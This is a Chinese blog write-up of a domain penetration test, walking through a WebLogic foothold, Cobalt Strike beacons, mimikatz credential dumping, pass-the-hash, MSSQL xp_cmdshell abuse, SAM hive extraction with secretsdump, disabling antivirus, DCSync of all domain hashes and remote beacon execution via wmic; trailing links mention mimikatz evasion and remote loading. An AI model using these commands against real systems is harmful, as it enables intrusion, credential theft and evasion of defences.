记一次常规的域渗透

VSole2023-03-30 09:48:11

1.入口是weblogic,上线无杀软,不再赘述写webshell和下载马子的过程,因此直接到上线cs:

一上来不要大规模的扫描,先对网络环境进行信息收集,发现没有域环境:

systeminfo

使用cs自带的mimikatz功能导出密码:

cs: logonpasswords

对该网段使用该凭证进行pth横向(通过hash进行传递):

该网段均横向失败,对fscan扫描结果进行数据处理,发现内网存在域和exchange,且没有弱口令,尝试对扫描出来的17-010和spring漏洞测试均尝试失败:


于是使用frp挂上代理进内网扫描弱口令

发现一个弱口令,尝试链接,成功登录并命令执行,但是是服务权限:

23.exe 20.20.20.17 sa sa@12345 master xp_cmdshell "whoami"

使用自带的clr_efspotato,提权失败:

23.exe 20.20.20.17 sa sa@12345 master clr_efspotato "whoami"

尝试使用SharpSQLTools上传提权文件,通过提权文件进行添加用户,远程桌面登陆后,手动执行beacon.exe

23.exe 20.20.20.17 sa sa@12345 master sourcefile destationfile

提权成功后接下来尝试添加用户:(这里引号需要转义,多加一个引号即可)

23.exe 20.20.20.17 sa sa@12345 master xp_cmdshell "cmd.exe /c 666.exe ""net user jijida admin!@#45""

okkkkkkkkkk,尝试登录:

发现卡巴斯基和edr,直接关闭:

私密马赛,我没能关掉,尝试通过导出密码拿下高用户的权限:

reg save hklm\sam sam.hivereg save hklm\system system.hive

本地secertdump解密这里我是从远程桌面托文件下来所以很卡,只选择下载了两个文件,security可以选择不下载:

python secretsdump.py -system system.hive -sam sam.hive local

administrator账户进行解密得到密码:@Nn031985

成功拿到管理员权限,在当前权限下继续使用当前账户进行横向:

发现17,20,25,57都可以横向

在57上发现域环境:

存在卡巴斯基,直接关闭,上传beacon.exe:

上线cs:

使用当前会话进行信息收集,导出密码的过程中发现一些邮箱口令:

注入域管进程:

在域管进程下进行域环境的信息收集,先查域管:

net group "domain admins" /domain

域成员:

net user /domain

找域控:

ping dc

这里不选择添加账户密码的话,默认选择当前权限(域管权限)进行横向:

wmic /mode:20.20.20.85 os get name

导出域内所有用户hash,这里使用mimikatz自带的dcsync功能:

mimikatz.exe "lsadump::dcsync /domain:test.com /all /csv" exit

20上有个exchange服务,尝试对20进行横向渗透:

建立ipc链接后,使用UNC路径传马:

\\ip\C$\

成功上线:

wmic /node:20.20.20.20 process call create "cmd.exe /c beacon.exe"

传马子:

上线:

新建一个域管:

3389尝试登录:


mimikatz
本作品采用《CC 协议》,转载必须注明作者和本文链接
mimikatz的这个功能从本质上是解析Windows的数据库文件,从而获取其中存储的用户哈希。
本文主要讨论学习mimikatz中与Kerberos协议相关的代码
而且Mimikatz这些知名工具的内容像mimikatz、作者信息之类的字符串就很容易被做为特征码识别。可以利用Visual Studio的替换功能实现关键字的处理。
过程Set-ExecutionPolicy Unrestricted -Scope CurrentUser //设置脚本策略Import-Module .\Invoke-PSimage.ps1 //导入脚本模块Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\mimikatz.png -Image .\demo.jpg -Web. 开启一个目标可以访问的web服务,加载生成的mimikatz.png图片。修改 example.com改成自己的web服务地址。然后进行远程加载即可。
萌新如何玩转mimikatz
2022-08-29 06:48:46
暑假快到了,身边好多师傅都开启了"卷王"模式,而我也在南城师傅的帮助下开始了内网这个新征程;mimikatz就是我遇见的一个坎,我希望记录下这个过程,尽可能的帮助大家更快的掌握mimikatz的用法和技巧。最后,再次谢谢南城师傅对本文的指导与帮助!!
list 列举出当前会话的所有缓存凭证,tgt列出当前会话的tgt信息。
主要功能配合使用工具(如Mimikatz)扫描本地密码,并将密码写入source/pass_list.txt 以下工具(1)简称(1)(1)检测域。检测到域后,工具 (2)自动使用 “net user /domain”等语法检测判断域用户(3)探索其他存活域主机:自动将网段IP信息写入source/ip_list.txt)语法:for /L %I in (1,1,254) DO @ping -w
Linux抓取Root明文密码
2021-10-24 08:30:58
在window下获取到administraot权限以后,使用mimikatz不管是抓取明文密码或是hash都很方便,但是在Linux就算获取到root权限了,获取hash倒是很简单cat一下就行,但是大概率很难解密出来。那么如何在Linux抓取root用户的明文密码,方面后续渗透呢?
横向移动相关
2022-05-08 06:31:56
横向移动相关
VSole
网络安全专家